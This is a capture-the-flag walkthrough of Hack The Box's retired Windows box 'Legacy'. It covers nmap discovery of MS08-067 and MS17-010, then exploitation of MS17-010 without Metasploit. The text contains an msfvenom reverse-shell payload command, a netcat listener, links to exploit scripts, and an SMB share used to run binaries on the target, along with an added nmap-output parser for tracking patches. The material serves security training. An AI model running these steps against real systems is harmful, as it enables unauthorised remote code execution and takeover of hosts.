HTB Walkthrough: Legacy w/o Metasploit (retired)

Shraddha M.
Apr 13, 2021

Legacy is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Legacy | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(kali㉿kali)-[~/labs/HTB/Legacy]
└─$ nmap -Pn -oA Legacy-ping 10.10.10.4
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-12 16:14 EDT
Nmap scan report for 10.10.10.4
Host is up (0.025s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server

SMB ports (139, 445) are open.

Enumeration

┌──(kali㉿kali)-[~/labs/HTB/Legacy]
└─$ nmap -Pn --script "smb-vuln*" -p 139,445 10.10.10.4

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-12 17:32 EDT
Nmap scan report for 10.10.10.4
Host is up (0.029s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).

The host is vulnerable to both MS08-067 and MS17-010; this walkthrough exploits MS17-010. A search for 'ms17-010 exploit' turns up the article the steps below follow: https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/ .
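To turn scan results like these into a patch-tracking record rather than a manual read, here is an added example (not code from the original post) that parses nmap's host script results and lists the smb-vuln checks that returned VULNERABLE together with their CVEs. The sample text inside is a constructed copy of the block above; the parser assumes nmap's `|` / `|_` line layout for script output.

```python
"""Triage nmap smb-vuln* script output into a list of confirmed findings."""
import re

# Constructed sample: a copy of the "Host script results" block from the scan above.
SAMPLE = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

# A script header is "| name:" or "|_name: single-line result".
SCRIPT_RE = re.compile(r"^\|[_ ]\s*(smb-vuln-[\w-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_smb_vuln(text):
    """Return {script_name: {"state": str, "cves": [..], "risk": str|None}}."""
    findings, current = {}, None
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:
            current, inline = m.group(1), m.group(2).strip()
            # Single-line results: "false" means not vulnerable, "ERROR: ..." means the check failed.
            state = "NOT_VULNERABLE" if inline == "false" else "UNKNOWN"
            if inline.startswith("ERROR"):
                state = "ERROR"  # a failed check is not a clean result; re-run with -d
            findings[current] = {"state": state, "cves": [], "risk": None}
            continue
        if current is None:
            continue
        body = line.lstrip("|_ ").strip()  # drop nmap's leading "|", "|_" and indentation
        if body.startswith("State:"):
            findings[current]["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):
            findings[current]["cves"].extend(CVE_RE.findall(body))
        elif body.startswith("Risk factor:"):
            findings[current]["risk"] = body.split(":", 1)[1].strip()
    return findings


def vulnerable(findings):
    """Names of checks whose State is VULNERABLE, i.e. the patches still missing on the host."""
    return sorted(name for name, f in findings.items() if f["state"] == "VULNERABLE")
```

Checks that return ERROR are reported separately rather than silently dropped, since a failed script says nothing about whether the patch is present.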

Exploitation

Download the exploit from: https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py . Get the gzipped Impacket tarball and, once it is untarred, run "pip install ." inside it. Save the mysmb.py file (https://github.com/worawit/MS17-010/blob/master/mysmb.py) in the same directory as send_and_execute.py.
Generate the payload (ms17-010.exe) using msfvenom.

┌──(kali㉿kali)-[~/labs/HTB/opt/impacket-0.9.22]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP> LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exe

┌──(kali㉿kali)-[~/labs/HTB/opt/impacket-0.9.22]
└─$ chmod +x ms17-010.exe

Running the exploit:
(a) Open a netcat session in another window: sudo nc -lvnp 443
(b)
┌──(kali㉿kali)-[~/labs/HTB/opt/impacket-0.9.22]
└─$ python ~/labs/HTB/Legacy/send_and_execute.py 10.10.10.4 ms17-010.exe
You should get a reverse shell. Finding the username:
(a) Locate whoami.exe in kali:
┌──(kali㉿kali)-[~]
└─$ locate whoami.exe
/usr/share/windows-resources/binaries/whoami.exe
(b) Locate smbserver.py in kali:
Use smbserver.py from the impacket installation directory.
(c) In kali: this opens a share named 'a' that serves whoami.exe from /usr/share/windows-resources/binaries/
┌──(kali㉿kali)-[~/…/HTB/opt/impacket-0.9.22/impacket]
└─$ sudo smbserver.py a /usr/share/windows-resources/binaries/

(d) In reverse shell (target windows):
C:\Documents and Settings\Administrator\Desktop>\\10.10.xx.xx\a\whoami.exe

Syntax: \\<Kali-IP>\<opened share>\<binary>
Since the shell already runs as Administrator, no privilege escalation is needed. Finding the flags:
User flag: "C:\Documents and Settings\john\Desktop>type user.txt".
Root flag: "C:\Documents and Settings\Administrator\Desktop>type root.txt".
